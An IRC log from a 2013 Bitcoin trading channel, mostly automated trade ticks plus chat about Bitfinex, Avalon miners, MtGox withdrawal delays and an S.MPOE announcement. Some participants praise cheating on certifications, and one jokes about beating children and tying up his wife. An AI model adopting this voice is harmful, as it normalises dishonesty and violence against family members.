20 23:51:06 This is my favorite faq so far Jun 20 23:51:09 I would like to trade like on MtGox, how do I do? Jun 20 23:51:09 You can open an "Exchange" account and use the "Exchange" tab of Bitfinex. Jun 20 23:51:30 it's funny they think they need a money-transmitter license when clearly what they do is waaay beyonf that regulatory-wise Jun 20 23:51:37 Q: I'm a long term bitcoin holder, what type of account suits me the best? Jun 20 23:51:37 A: You can open a "Deposit" account to lend bitcoins to others Bitfinex traders. Jun 20 23:51:48 lol Jun 20 23:52:00 oh wait the next one is even better Jun 20 23:52:03 The kind of account where we take your money obv! Jun 20 23:52:08 [BTCTC] [BITVPS] 4 @ 0.001202 = 0.0048 BTC [-] Jun 20 23:52:23 Q: How can I take advantage of bitcoin market even if I don't like Bitcoin or don't feel like buying it? Jun 20 23:52:28 You can open a "Deposit" account to lend US dollars to others Bitfinex traders. Jun 20 23:52:30 A: Mimic the EFF! Jun 20 23:52:30 https://community.bitfinex.com/showwiki.php Jun 20 23:52:37 actually the design improves as you go deeper. Jun 20 23:52:42 for some values of "improves" Jun 20 23:53:49 Q: Can traders withdraw borrowed funds? Jun 20 23:53:49 A: No, trader can only use borrowed funds on Bitfinex, they can't withdraw it. Lenders are safe from this point of view. Jun 20 23:53:54 https://community.bitfinex.com/forumdisplay.php/6-Wiki Jun 20 23:53:55 other points of vuew, not so much Jun 20 23:53:57 forum:wiki Jun 20 23:54:24 how did their little drama end up btw? Jun 20 23:54:26 The site really unsecured, someone is going to hack and wreck that shit, oh wait maybe they already did and they made it twinkie Jun 20 23:54:36 site looks Jun 20 23:55:12 surely kakobrekla pointed this out months ago Jun 20 23:56:30 why is Avalon plant so dusty anyway? Jun 20 23:56:51 https://bitcointalk.org/index.php?topic=236348.msg2531609#msg2531609 Jun 20 23:56:55 ;;nethash Jun 20 23:57:47 [BTCTC] [ASICMINER-PT] 1 @ 2.823 BTC [-] Jun 20 23:58:36 [HAVELOCK] [ASICM] 199 @ 0.0281 = 5.5919 BTC [-] Jun 20 23:58:37 [HAVELOCK] [ASICM] 103 @ 0.02801 = 2.885 BTC [-] Jun 20 23:58:39 [HAVELOCK] [ASICM] 71 @ 0.02800001 = 1.988 BTC [-] Jun 20 23:58:40 [HAVELOCK] [ASICM] 1 @ 0.028 BTC [-] Jun 20 23:58:41 [HAVELOCK] [ASICM] 26 @ 0.028 = 0.728 BTC [-] Jun 20 23:59:56 not saying that the avalon people aren;'t lieing like it's going out of fashion, but Jun 20 23:59:59 "If these units have been produced a week ago, like we are being told (new magic smt line, 50 units per day), how is it that they have an April firmware on it?" Jun 21 00:00:17 that part could be easily explained. the firmware is being flashed before the chips are put in Jun 21 00:00:53 Easy, the guy that made the two units with the old firmware- he forgot to do his updates- DOH Jun 21 00:01:00 [BTCTC] [COGNITIVE] 1 @ 0.280001 BTC [-] Jun 21 00:01:02 [BTCTC] [COGNITIVE] 2 @ 0.28 = 0.56 BTC [-] Jun 21 00:01:05 [BTCTC] [COGNITIVE] 4 @ 0.275 = 1.1 BTC [-] Jun 21 00:01:06 [BTCTC] [COGNITIVE] 2 @ 0.265 = 0.53 BTC [-] Jun 21 00:01:11 [BTCTC] [CRYPTO-TRADE] 30 @ 0.199997 = 5.9999 BTC [+] Jun 21 00:01:11 [BTCTC] [COGNITIVE] 4 @ 0.261 = 1.044 BTC [-] Jun 21 00:01:12 [BTCTC] [COGNITIVE] 12 @ 0.2605 = 3.126 BTC [-] Jun 21 00:01:12 [BTCTC] [COGNITIVE] 10 @ 0.26 = 2.6 BTC [-] Jun 21 00:01:21 smart trader^ Jun 21 00:01:26 Yeah, the firmware part could have many causes Jun 21 00:01:57 i imagine they'd have one of those higher volume flasher things Jun 21 00:02:07 as it'd be insanity to flash chip by chip after mounting in the unit Jun 21 00:02:09 well, you would hope so Jun 21 00:02:19 not saying insanity is a stranger to mining corps Jun 21 00:02:24 [BTCTC] [COG.F] 3 @ 2.999 = 8.997 BTC [+] Jun 21 00:02:28 yeah, it did take months Jun 21 00:02:40 well they have the time to burn in every unit for 1-60 days Jun 21 00:02:48 presumably your flashing once per board, not chip Jun 21 00:02:59 Sminumum burn in time (just to make sure) 3 months Jun 21 00:03:02 minimum Jun 21 00:03:36 dub by chip i meant the board's controller Jun 21 00:03:38 not the hashing chips Jun 21 00:04:07 you don't flash asics anyway, or am i grossly confused here ? Jun 21 00:05:22 the firmware he is referencing in the photo is the router Jun 21 00:05:26 I am pretty sure, Jun 21 00:05:30 need to look again Jun 21 00:05:36 [BTCTC] [DMS.MINING] 5 @ 0.017999 = 0.09 BTC [+] Jun 21 00:06:13 looks like my fat finger selloff of dms.mining did hurt the price Jun 21 00:06:25 let's just say i did it on purpose instead Jun 21 00:10:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.028422 BTC [-] Jun 21 00:10:26 [BTCTC] [TAT.ASICMINER] 228 @ 0.0284 = 6.4752 BTC [-] Jun 21 00:10:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0287 BTC [+] Jun 21 00:14:54 [BTCTC] [BITVPS] 3 @ 0.001241 = 0.0037 BTC [+] Jun 21 00:15:32 [BTCTC] [CRYPTO-TRADE] 4 @ 0.199997 = 0.8 BTC [+] Jun 21 00:16:10 [BTCTC] [CRYPTO-TRADE] 3 @ 0.199997 = 0.6 BTC [+] Jun 21 00:17:11 [HAVELOCK] [ASICM] 70 @ 0.0284 = 1.988 BTC [+] Jun 21 00:18:38 [BTCTC] [BITVPS] 10 @ 0.001529 = 0.0153 BTC [+] Jun 21 00:19:07 mircea_popescu: yeah, chip itself shouldnt need code Jun 21 00:19:17 [BTCTC] [BITVPS] 14 @ 0.00153 = 0.0214 BTC [+] Jun 21 00:19:44 if it did i'd say it's veering worryingly towards fpga Jun 21 00:20:15 [BTCTC] [BITVPS] 2 @ 0.00152 = 0.003 BTC [-] Jun 21 00:20:39 [BTCTC] [BITVPS] 2 @ 0.00152 = 0.003 BTC [-] Jun 21 00:21:10 [BTCTC] [BITVPS] 1 @ 0.00152 BTC [-] Jun 21 00:27:24 [MPEX] [S.MPOE] 2000 @ 0.00077392 = 1.5478 BTC [+] Jun 21 00:28:38 [BTCTC] [TAT.ASICMINER] 89 @ 0.0284 = 2.5276 BTC [-] Jun 21 00:29:24 [BTCTC] [ASICMINER-PT] 1 @ 2.862 BTC [+] Jun 21 00:30:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.028799 BTC [+] Jun 21 00:38:26 [BTCTC] [PAJKA.BOND] 1 @ 0.045 BTC [+] Jun 21 00:42:34 [BTCTC] [DMS.MINING] 36 @ 0.017999 = 0.648 BTC [+] Jun 21 00:43:58 [BTCTC] [DMS.MINING] 224 @ 0.018 = 4.032 BTC [+] Jun 21 00:44:03 [BTCTC] [DMS.MINING] 66 @ 0.018 = 1.188 BTC [+] Jun 21 00:44:39 !ticker m s.dice Jun 21 00:44:40 [MPEX:S.DICE] 1D: 0.00200005 / 0.00200005 / 0.00200005 (2000 shares, 4.00 BTC), 7D: 0.0018 / 0.00188622 / 0.00233486 (585137 shares, 1,103.70 BTC), 30D: 0.00179 / 0.00198416 / 0.00296096 (2873579 shares, 5,701.65 BTC) Jun 21 00:46:31 [BTCTC] [COGNITIVE] 1 @ 0.251104 BTC [-] Jun 21 00:46:33 [BTCTC] [COGNITIVE] 1 @ 0.251103 BTC [-] Jun 21 00:46:34 [BTCTC] [COGNITIVE] 2 @ 0.2511 = 0.5022 BTC [-] Jun 21 00:46:36 [BTCTC] [COGNITIVE] 8 @ 0.251 = 2.008 BTC [-] Jun 21 00:48:44 [BTCTC] [BASIC-MINING] 1 @ 1.38 BTC [-] Jun 21 00:49:11 [BTCTC] [BASIC-MINING] 1 @ 1.38 BTC [-] Jun 21 00:49:40 [BTCTC] [B.YABMC] 1 @ 0.009999 BTC [-] Jun 21 00:50:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.028798 = 0.2592 BTC [-] Jun 21 00:53:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.0284 = 0.1136 BTC [-] Jun 21 00:54:29 [BTCTC] [ASICMINER-PT] 1 @ 2.865 BTC [+] Jun 21 00:54:48 [BTCTC] [TAT.ASICMINER] 61 @ 0.0284 = 1.7324 BTC [-] Jun 21 00:54:59 [BTCTC] [BASIC-MINING] 1 @ 1.150001 BTC [-] Jun 21 00:55:38 [BTCTC] [BASIC-MINING] 1 @ 1.150001 BTC [-] Jun 21 00:57:06 [BTCTC] [TAT.ASICMINER] 300 @ 0.0284 = 8.52 BTC [-] Jun 21 00:57:23 [HAVELOCK] [ASICM] 37 @ 0.0284989 = 1.0545 BTC [+] Jun 21 00:58:19 [HAVELOCK] [VTX] 4 @ 0.45 = 1.8 BTC [-] Jun 21 00:59:03 yo mircea_popescu Jun 21 00:59:22 [HAVELOCK] [ASICM] 8 @ 0.0284989 = 0.228 BTC [+] Jun 21 00:59:48 [HAVELOCK] [ASICM] 7 @ 0.0284999 = 0.1995 BTC [+] Jun 21 00:59:52 [HAVELOCK] [ASICM] 60 @ 0.0284989 = 1.7099 BTC [-] Jun 21 01:08:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.028798 = 0.0864 BTC [+] Jun 21 01:17:22 [BTCTC] [DMS.MINING] 9 @ 0.018 = 0.162 BTC [+] Jun 21 01:17:23 [BTCTC] [DMS.MINING] 51 @ 0.018 = 0.918 BTC [+] Jun 21 01:18:54 ;;bids 0 Jun 21 01:19:00 ;;asks 1111111111111111111 Jun 21 01:19:08 truffles: you're missing out on finland cultural heritage day in -trollbox, http://www.youtube.com/watch?v=fftnExG-WFg Jun 21 01:19:30 [MPEX] [S.MPOE] 13000 @ 0.00077425 = 10.0653 BTC [+] Jun 21 01:23:04 [HAVELOCK] [ASICM] 38 @ 0.02801301 = 1.0645 BTC [-] Jun 21 01:25:24 [BTCTC] [COGNITIVE] 20 @ 0.255 = 5.1 BTC [+] Jun 21 01:25:27 [BTCTC] [COGNITIVE] 7 @ 0.251 = 1.757 BTC [-] Jun 21 01:25:27 [BTCTC] [COGNITIVE] 5 @ 0.245 = 1.225 BTC [-] Jun 21 01:25:28 [BTCTC] [COGNITIVE] 4 @ 0.243 = 0.972 BTC [-] Jun 21 01:25:31 [BTCTC] [COGNITIVE] 1 @ 0.24181 BTC [-] Jun 21 01:25:33 [BTCTC] [COGNITIVE] 2 @ 0.24 = 0.48 BTC [-] Jun 21 01:26:07 [BTCTC] [COGNITIVE] 1 @ 0.288996 BTC [+] Jun 21 01:26:42 [BTCTC] [COGNITIVE] 1 @ 0.288997 BTC [+] Jun 21 01:35:10 thestringpuller sup Jun 21 01:37:20 lol twitter going crazy over mpoe announcement Jun 21 01:38:42 [BTCTC] [BITVPS] 5 @ 0.00151 = 0.0076 BTC [-] Jun 21 01:38:45 [BTCTC] [BITVPS] 4 @ 0.00152 = 0.0061 BTC [+] Jun 21 01:38:49 [BTCTC] [BITVPS] 36 @ 0.00153 = 0.0551 BTC [+] Jun 21 01:39:40 im gonna RT that one too. congrats! Jun 21 01:39:50 link? Jun 21 01:40:50 http://trilema.com/2013/smpoe-takes-strategic-investor/ Jun 21 01:41:40 [BTCTC] [TAT.ASICMINER] 27 @ 0.028799 = 0.7776 BTC [+] Jun 21 01:41:45 wonder who it is Jun 21 01:42:00 someone like BitPay using the options system? Jun 21 01:42:02 [BTCTC] [TAT.ASICMINER] 21 @ 0.0288 = 0.6048 BTC [+] Jun 21 01:44:36 [HAVELOCK] [ASICM] 1 @ 0.0284999 BTC [+] Jun 21 01:45:13 [MPEX] [S.MPOE] 2691 @ 0.00077392 = 2.0826 BTC [-] Jun 21 01:47:52 [BTCTC] [COGNITIVE] 1 @ 0.288993 BTC [-] Jun 21 01:48:27 [BTCTC] [ASICMINER-PT] 1 @ 2.866899 BTC [+] Jun 21 01:48:53 cheating doesn't hamper your education Jun 21 01:49:07 cheating is a valuable skill set Jun 21 01:49:24 it teaches one to look at rules in an abstract way and find alternatives. Jun 21 01:49:25 true Jun 21 01:49:48 unfortunately it takes a modicum of intelligence and skill to pull off. Jun 21 01:50:15 54 yo masquerading as a 19 yo? Jun 21 01:52:00 [BTCTC] [ASICMINER-PT] 1 @ 2.8669 BTC [+] Jun 21 01:52:44 [BTCTC] [ASICMINER-PT] 1 @ 2.868 BTC [+] Jun 21 01:52:44 some trades carry and expectation of willingness to cheat Jun 21 01:53:20 e.g. large percentage of trade certifications like CCIE are obtained through cheating Jun 21 01:53:55 http://www.youtube.com/embed/xyPrJb1_IdI lmao Jun 21 01:54:21 its usually more important for a company to have n*ccie on staff than actually have the skills on hand Jun 21 01:54:51 [BTCTC] [COGNITIVE] 1 @ 0.2708 BTC [-] Jun 21 01:55:20 jevons bless the cartels Jun 21 01:55:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.0285 = 0.171 BTC [-] Jun 21 01:57:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.028402 BTC [-] Jun 21 01:57:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.028401 = 0.284 BTC [-] Jun 21 01:57:38 [BTCTC] [TAT.ASICMINER] 58 @ 0.0284 = 1.6472 BTC [-] Jun 21 01:57:57 [BTCTC] [PAJKA.BOND] 1 @ 0.045 BTC [+] Jun 21 01:59:26 [BTCTC] [CRYPTO-TRADE] 10 @ 0.199995 = 2 BTC [-] Jun 21 02:00:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.0284 = 0.568 BTC [-] Jun 21 02:03:20 [BTCTC] [GSDPT] 1 @ 0.002586 BTC [-] Jun 21 02:04:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005701 BTC [-] Jun 21 02:08:54 [BTCTC] [ASICMINER-PT] 2 @ 2.868 = 5.736 BTC [+] Jun 21 02:09:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.0287 = 0.1722 BTC [+] Jun 21 02:11:00 [MPEX] [S.MPOE] 7909 @ 0.00077329 = 6.116 BTC [-] Jun 21 02:11:02 [MPEX] [S.MPOE] 25250 @ 0.00077283 = 19.514 BTC [-] Jun 21 02:11:05 [MPEX] [S.MPOE] 7900 @ 0.00077425 = 6.1166 BTC [+] Jun 21 02:11:16 [MPEX] [S.MPOE] 3056 @ 0.00077441 = 2.3666 BTC [+] Jun 21 02:11:18 [MPEX] [S.MPOE] 5885 @ 0.0007801 = 4.5909 BTC [+] Jun 21 02:11:19 [MPEX] [S.MPOE] 915 @ 0.0007801 = 0.7138 BTC [+] Jun 21 02:12:23 mircea_popescu: <3 troma Jun 21 02:13:04 i just got retweeted by CoastalBendYoungDems Jun 21 02:13:08 i feel very dirty now ;/ Jun 21 02:18:52 searching for your twitter account I found https://twitter.com/mirceasboobs Jun 21 02:19:00 are those really your boobs? Jun 21 02:19:12 dafuck Jun 21 02:19:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0287 BTC [+] Jun 21 02:19:33 they aren't my boobs lol Jun 21 02:19:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.0287 = 0.2296 BTC [+] Jun 21 02:20:08 I think they are his boobs. Jun 21 02:20:09 and they're not even great boobs. Jun 21 02:20:17 xD Jun 21 02:20:24 https://twitter.com/Mircea_Popescu/status/347798434494947328 there you go. THOSE are my boobs. Jun 21 02:21:14 [HAVELOCK] [ASICM] 10 @ 0.0284999 = 0.285 BTC [+] Jun 21 02:22:54 [BTCTC] [BASIC-MINING] 1 @ 1.221001 BTC [+] Jun 21 02:23:17 [HAVELOCK] [ASICM] 1 @ 0.0284999 BTC [+] Jun 21 02:24:07 https://twitter.com/SwearengenCD/status/347854948547063808 Jun 21 02:25:18 haha Jun 21 02:27:44 [BTCTC] [ASICMINER-PT] 1 @ 2.859 BTC [-] Jun 21 02:28:17 [BTCTC] [ASICMINER-PT] 2 @ 2.859 = 5.718 BTC [-] Jun 21 02:29:31 Thank you for the email. As of now there is a delay in bitcoin transactions. We apologize for the inconvenience caused. Jun 21 02:29:41 mtgox gives up on bitcoin withdrawals too. Jun 21 02:29:54 "proof of talk" <-- funny Jun 21 02:30:49 wow 92 RTs on that one Jun 21 02:30:49 so far Jun 21 02:30:49 i just got home, did you jsut say GOX ahs stopped BTC txns? Jun 21 02:30:54 please me trolling me Jun 21 02:31:00 *be Jun 21 02:31:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0284 BTC [-] Jun 21 02:31:34 https://bitcointalk.org/index.php?topic=237640.msg2513960#msg2513960 Jun 21 02:32:23 [BTCTC] [ASICMINER-PT] 1 @ 2.859 BTC [-] Jun 21 02:33:20 [BTCTC] [BITVPS] 1 @ 0.00164 BTC [+] Jun 21 02:33:21 [BTCTC] [BASIC-MINING] 1 @ 1.221001 BTC [+] Jun 21 02:34:06 fawk me Jun 21 02:34:27 well, you did warn me, like 15 times over the last 6 months. Jun 21 02:34:55 pickled* Jun 21 02:38:35 [BTCTC] [TAT.ASICMINER] 13 @ 0.0287 = 0.3731 BTC [+] Jun 21 02:41:26 [BTCTC] [TAT.ASICMINER] 100 @ 0.0284 = 2.84 BTC [-] Jun 21 02:41:33 That's a fucking candle Jun 21 02:41:43 I was going to buy last night :( Jun 21 02:42:04 Need to hang out on IRC more Jun 21 02:42:05 [BTCTC] [ASICMINER-PT] 1 @ 2.859 BTC [-] Jun 21 02:44:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0284 BTC [-] Jun 21 02:45:00 have you used btcwarn.com ? free. Jun 21 02:45:34 it worked for me on tuesday. i wonder if it will again. Jun 21 02:45:52 [BTCTC] [ASICMINER-PT] 1 @ 2.868 BTC [+] Jun 21 02:46:49 Why text or email... Jun 21 02:47:07 because notification Jun 21 02:47:09 Unless you're on the move and use your smartphone to trade. Jun 21 02:47:26 [BTCTC] [TAT.ASICMINER] 138 @ 0.0284 = 3.9192 BTC [-] Jun 21 02:47:53 if you can turn off your card before driving home, run back inside to work and change some trades. I'm not a programmer so I can't program bots to do it for me. Jun 21 02:48:04 learning, but slowly. Jun 21 02:48:18 btcwarn ain't half bad, did you look at it? Jun 21 02:50:34 I need something noisy, a text wouldn't work. And if I'm on the move, I don't have internet with me so wouldn't help. Jun 21 02:51:17 Nice moves on BASIC Jun 21 02:52:55 [BTCTC] [ASICMINER-PT] 1 @ 2.868 BTC [+] Jun 21 02:53:05 This might be a less uncertain bet with everything that's going on with Cognitive these days: http://bitbet.us/bet/314/bitcointalk-org-treasurer-to-be-scammer-tagged/ Jun 21 02:54:39 nanotube bitcoin-otc.com being ddosed ? Jun 21 03:01:17 [HAVELOCK] [ASICM] 2 @ 0.02849989 = 0.057 BTC [-] Jun 21 03:05:06 [BTCTC] [DMS.PURCHASE] 20 @ 0.054411 = 1.0882 BTC [-] Jun 21 03:05:30 [BTCTC] [DMS.PURCHASE] 80 @ 0.054412 = 4.353 BTC [+] Jun 21 03:10:25 [HAVELOCK] [ASICM] 5 @ 0.0281011 = 0.1405 BTC [-] Jun 21 03:12:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.028312 BTC [-] Jun 21 03:12:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.028312 BTC [-] Jun 21 03:12:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.028311 = 0.1416 BTC [-] Jun 21 03:12:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.028311 = 0.1132 BTC [-] Jun 21 03:25:06 [HAVELOCK] [ASICM] 9 @ 0.02849989 = 0.2565 BTC [+] Jun 21 03:27:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.028311 = 0.0566 BTC [-] Jun 21 03:29:38 [HAVELOCK] [ASICM] 4 @ 0.02849 = 0.114 BTC [-] Jun 21 03:29:51 [BTCTC] [BASIC-MINING] 1 @ 1.222001 BTC [+] Jun 21 03:31:35 [HAVELOCK] [ASICM] 45 @ 0.02849 = 1.2821 BTC [-] Jun 21 03:32:23 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.005302 = 0.0212 BTC [-] Jun 21 03:32:30 [BTCTC] [TAT.VIRTUALMINE] 34 @ 0.005301 = 0.1802 BTC [-] Jun 21 03:32:38 [MPEX] [S.MPOE] 6600 @ 0.0007803 = 5.15 BTC [+] Jun 21 03:33:02 hm, anyone here uses AurumExchange ? Jun 21 03:33:20 "Effective immediately, we are discontinuing all business operations pending a business model review. At this time we are unsure when, and if we will resume operations in the future." Jun 21 03:33:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005677 BTC [+] Jun 21 03:33:30 [BTCTC] [DMS.PURCHASE] 22 @ 0.054412 = 1.1971 BTC [+] Jun 21 03:34:43 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [+] Jun 21 03:35:53 humm, I think Aurum was a way to get money into gox Jun 21 03:36:48 [BTCTC] [ASICMINER-PT] 2 @ 2.86 = 5.72 BTC [-] Jun 21 03:38:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.028679 = 0.0574 BTC [+] Jun 21 03:38:57 mircea_popescu I take issue with your classification of the English speaking world. Like you, I have a seat on mpex and I personally was trying to pitch s.dice shares in a white suit at San Francisco meetups a full two months before you showed up on your blog in a white suit. Jun 21 03:39:08 [BTCTC] [TAT.ASICMINER] 32 @ 0.0288 = 0.9216 BTC [+] Jun 21 03:39:10 [BTCTC] [ASICMINER-PT] 2 @ 2.873 = 5.746 BTC [+] Jun 21 03:39:13 [BTCTC] [ASICMINER-PT] 2 @ 2.88 = 5.76 BTC [+] Jun 21 03:39:20 [BTCTC] [ASICMINER-PT] 1 @ 2.885 BTC [+] Jun 21 03:39:22 [BTCTC] [ASICMINER-PT] 1 @ 2.888 BTC [+] Jun 21 03:39:31 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 21 03:39:41 [BTCTC] [ASICMINER-PT] 4 @ 2.897 = 11.588 BTC [+] Jun 21 03:39:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.0288 = 0.0864 BTC [+] Jun 21 03:39:50 [BTCTC] [ASICMINER-PT] 1 @ 2.898 BTC [+] Jun 21 03:39:55 [BTCTC] [ASICMINER-PT] 1 @ 2.898284 BTC [+] Jun 21 03:40:00 [BTCTC] [ASICMINER-PT] 27 @ 2.8989 = 78.2703 BTC [+] Jun 21 03:40:51 cole_albon i see! Jun 21 03:40:58 [HAVELOCK] [ASICM] 5 @ 0.02849 = 0.1425 BTC [-] Jun 21 03:41:06 how did that go ? Jun 21 03:43:05 [MPEX] [S.MPOE] 5820 @ 0.00078989 = 4.5972 BTC [+] Jun 21 03:44:41 mircea_popescu: the only thing that has kept me from financial ruin has been a day job and a few hundred thousand ripples. (I assume that's the entity you were talking about) Today was the first time in my life I've gone to mpex.co and been pleasantly surprised. I'm a believer again, at least for now, and I will be wearing the white suite to work tomorrow. Jun 21 03:46:05 hm Jun 21 03:46:21 you don't sound fully mentally stable Jun 21 03:50:05 It's not that bad, I just have been a little irritated about mp stealing the white suit thing and the trash talking against English speakers such as myself just put me over the edge. Jun 21 03:50:48 you know the white suit pic is kinda old. Jun 21 03:51:00 i just change the header seasonally. Jun 21 03:51:08 sure it is... Jun 21 03:52:16 http://trilema.com/wp-content/themes/trilema/images/bg_apr2009.jpg Jun 21 03:52:20 2009, ye know ? Jun 21 03:52:33 okay, fine. I'll shut up. Jun 21 03:52:47 congrats by the way. Jun 21 03:52:57 thanks Jun 21 03:53:11 you know your trolling is sorta like fat men dancing Jun 21 03:53:55 I don't know what that means Jun 21 03:54:14 well have you ever seen fat men dancing ? Jun 21 03:57:14 I said I would shut up, so... Jun 21 04:04:12 Again for your consideration: http://bfmines.com/2013/06/21/escrow-details-and-ipo-process/ Jun 21 04:06:19 [MPEX] [S.MPOE] 64180 @ 0.00078989 = 50.6951 BTC [+] Jun 21 04:06:21 [MPEX] [S.MPOE] 10000 @ 0.0007899 = 7.899 BTC [+] Jun 21 04:06:22 [MPEX] [S.MPOE] 325820 @ 0.00079 = 257.3978 BTC [+] Jun 21 04:07:20 [MPEX] [S.MPOE] 49085 @ 0.00079 = 38.7772 BTC [+] Jun 21 04:07:44 [BTCTC] [ASICMINER-PT] 1 @ 2.89399 BTC [-] Jun 21 04:07:55 [BTCTC] [RSM] 1 @ 0.026 BTC [-] Jun 21 04:08:22 [BTCTC] [RSM] 59 @ 0.023521 = 1.3877 BTC [-] Jun 21 04:09:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.02879 BTC [-] Jun 21 04:10:26 ;;nethash Jun 21 04:16:21 furuknap: who is that? Jun 21 04:16:34 Who is what? Jun 21 04:16:36 and also what is that Jun 21 04:16:45 I got 2 BTC on the spurs.... Jun 21 04:16:49 that to which your link refer Jun 21 04:16:50 anyone else? Jun 21 04:16:56 The asset? That's my new mining asset. Jun 21 04:17:06 [HAVELOCK] [ASICM] 2 @ 0.02845 = 0.0569 BTC [-] Jun 21 04:17:31 Bugpowder: spurs? Jun 21 04:17:52 link ? Jun 21 04:17:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.02879 = 0.4606 BTC [-] Jun 21 04:17:59 [BTCTC] [DMS.MINING] 2 @ 0.0183 = 0.0366 BTC [+] Jun 21 04:18:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.0289 = 0.1445 BTC [+] Jun 21 04:18:01 [BTCTC] [DMS.MINING] 4 @ 0.01825 = 0.073 BTC [-] Jun 21 04:18:02 [BTCTC] [DMS.MINING] 3 @ 0.0182 = 0.0546 BTC [-] Jun 21 04:18:03 [BTCTC] [DMS.MINING] 5 @ 0.01818 = 0.0909 BTC [-] Jun 21 04:18:05 [BTCTC] [DMS.MINING] 1 @ 0.01815 BTC [-] Jun 21 04:18:06 [BTCTC] [PAJKA.BOND] 1 @ 0.045 BTC [+] Jun 21 04:18:07 [BTCTC] [DMS.MINING] 1 @ 0.0181 BTC [-] Jun 21 04:18:07 NBA Finals, Game 7? Jun 21 04:18:08 [BTCTC] [DMS.MINING] 1 @ 0.01805 BTC [-] Jun 21 04:18:09 [BTCTC] [DMS.MINING] 1 @ 0.01802 BTC [-] Jun 21 04:18:10 [BTCTC] [DMS.MINING] 2 @ 0.01801 = 0.036 BTC [-] Jun 21 04:18:12 [BTCTC] [DMS.MINING] 25 @ 0.018 = 0.45 BTC [-] Jun 21 04:18:12 nobody? Jun 21 04:18:12 [BTCTC] [DMS.MINING] 28 @ 0.018 = 0.504 BTC [-] Jun 21 04:18:13 [BTCTC] [DMS.MINING] 10 @ 0.017988 = 0.1799 BTC [-] Jun 21 04:18:14 [BTCTC] [DMS.MINING] 17 @ 0.017987 = 0.3058 BTC [-] Jun 21 04:18:22 LeBron James? Jun 21 04:18:48 Erhm... Jun 21 04:19:43 Bugpowder: is that with the egg shaped ball thingy? Jun 21 04:19:44 [BTCTC] [B.YABMC] 5 @ 0.009999 = 0.05 BTC [-] Jun 21 04:19:54 or with the ice skates Jun 21 04:20:34 sigh Jun 21 04:20:51 Yall need to become more well rounded Jun 21 04:20:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0052 BTC [-] Jun 21 04:20:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.005002 = 0.05 BTC [-] Jun 21 04:21:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005001 BTC [-] Jun 21 04:21:01 get off the computer and watch some TV Jun 21 04:21:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [-] Jun 21 04:21:02 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00481 = 0.0481 BTC [-] Jun 21 04:21:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0048 BTC [-] Jun 21 04:21:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004631 BTC [-] Jun 21 04:21:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0046 BTC [-] Jun 21 04:21:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00459 BTC [-] Jun 21 04:21:16 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004551 = 0.0137 BTC [-] Jun 21 04:21:37 [BTCTC] [RSM] 10 @ 0.023411 = 0.2341 BTC [-] Jun 21 04:21:38 [BTCTC] [RSM] 1 @ 0.02341 BTC [-] Jun 21 04:21:43 [BTCTC] [RSM] 15 @ 0.0234 = 0.351 BTC [-] Jun 21 04:21:45 [BTCTC] [RSM] 15 @ 0.023142 = 0.3471 BTC [-] Jun 21 04:21:47 [BTCTC] [RSM] 100 @ 0.021551 = 2.1551 BTC [-] Jun 21 04:21:59 yessir gonna watch me some sports, beat the kids, tie up the wife and call in a whore Jun 21 04:22:10 [BTCTC] [PAJKA.BOND] 2 @ 0.045 = 0.09 BTC [+] Jun 21 04:22:22 [BTCTC] [ASICMINER-PT] 1 @ 2.89399 BTC [-] Jun 21 04:22:22 tie up the wife and call in a whore << sounds like a winner. Jun 21 04:22:27 pass me my 'turkey Jun 21 04:22:36 it's pabst blue ribbon. Jun 21 04:22:49 [BTCTC] [ASICMINER-PT] 1 @ 2.894 BTC [+] Jun 21 04:22:50 [BTCTC] [RSM] 4 @ 0.02155 = 0.0862 BTC [-] Jun 21 04:22:51 [BTCTC] [RSM] 1 @ 0.021025 BTC [-] Jun 21 04:22:52 now look in the cam and say "i'm white trash and im on irc!" Jun 21 04:22:52 [BTCTC] [RSM] 1 @ 0.021022 BTC [-] Jun 21 04:22:59 [BTCTC] [RSM] 10 @ 0.02 = 0.2 BTC [-] Jun 21 04:23:02 [BTCTC] [RSM] 10 @ 0.018 = 0.18 BTC [-] Jun 21 04:23:05 [BTCTC] [RSM] 3 @ 0.018 = 0.054 BTC [-] Jun 21 04:23:11 [BTCTC] [ASICMINER-PT] 1 @ 2.8979 BTC [+] Jun 21 04:23:31 yall come back now y'eard Jun 21 04:23:32 lol Jun 21 04:23:33 [BTCTC] [RSM] 10 @ 0.029 = 0.29 BTC [+] 